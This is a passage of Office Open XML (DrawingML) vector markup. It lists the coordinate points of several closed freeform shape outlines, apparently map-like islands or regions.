                      <a:pt x="1238" y="1107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1242" y="1121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="1121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1258" y="1120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="1127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1267" y="1129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="1133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="1141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="1142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1251" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1250" y="1137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1244" y="1141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1251" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="1160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1243" y="1164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1241" y="1169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1238" y="1167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1230" y="1176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1233" y="1191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1230" y="1193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="1188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="1185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="1173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="1168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="1163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="1152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1182" y="1136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1176" y="1131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1165" y="1143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172" y="1155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="1157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1165" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1158" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1153" y="1143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="1152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1161" y="1169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1166" y="1169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="1170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1173" y="1180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1178" y="1194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="1201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1186" y="1196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="1197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="1203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="1208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1201" y="1216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="1220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="1223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1213" y="1235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1215" y="1238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="1249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="1256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="1238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="1234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="1238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="1242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="1265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="1268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="1275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="1283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="1275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="1264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="1264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1189" y="1265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="1262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1173" y="1252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="1247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="1236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1164" y="1249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="1241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1151" y="1239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1145" y="1238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1146" y="1242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1152" y="1253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1158" y="1260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="1270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1180" y="1280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1185" y="1288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1189" y="1296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="1306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1179" y="1301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="1295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1159" y="1290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1149" y="1289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1134" y="1275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1126" y="1273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1122" y="1269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="1267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="1270"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="672" y="920"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="668" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="654" y="891"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="830"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="826"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="826"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="654" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="794"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="801"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="845"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="902"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="895"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="893"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="910"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="920"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="738" y="878"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="730" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="801"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="773"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="786" y="776"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="793" y="776"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="784"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="795" y="802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="845"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="878"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="293" y="930"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="287" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="917"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="907"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="901"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="893"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="891"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="879"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="810"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="800"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="804"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="869"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="893"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="911"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="914"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="930"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="807" y="637"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="800" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="794" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="825" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="830" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="681"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="681"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="685"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="681"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="944" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="681"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="967" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="971" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="973" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="975" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="961" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="960" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="963" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="941" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="937" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="931" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="922" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="920" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="738"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="908" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="903" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="836" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="808" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="802" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="793" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="734"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="637"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="714"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="645" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="681"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
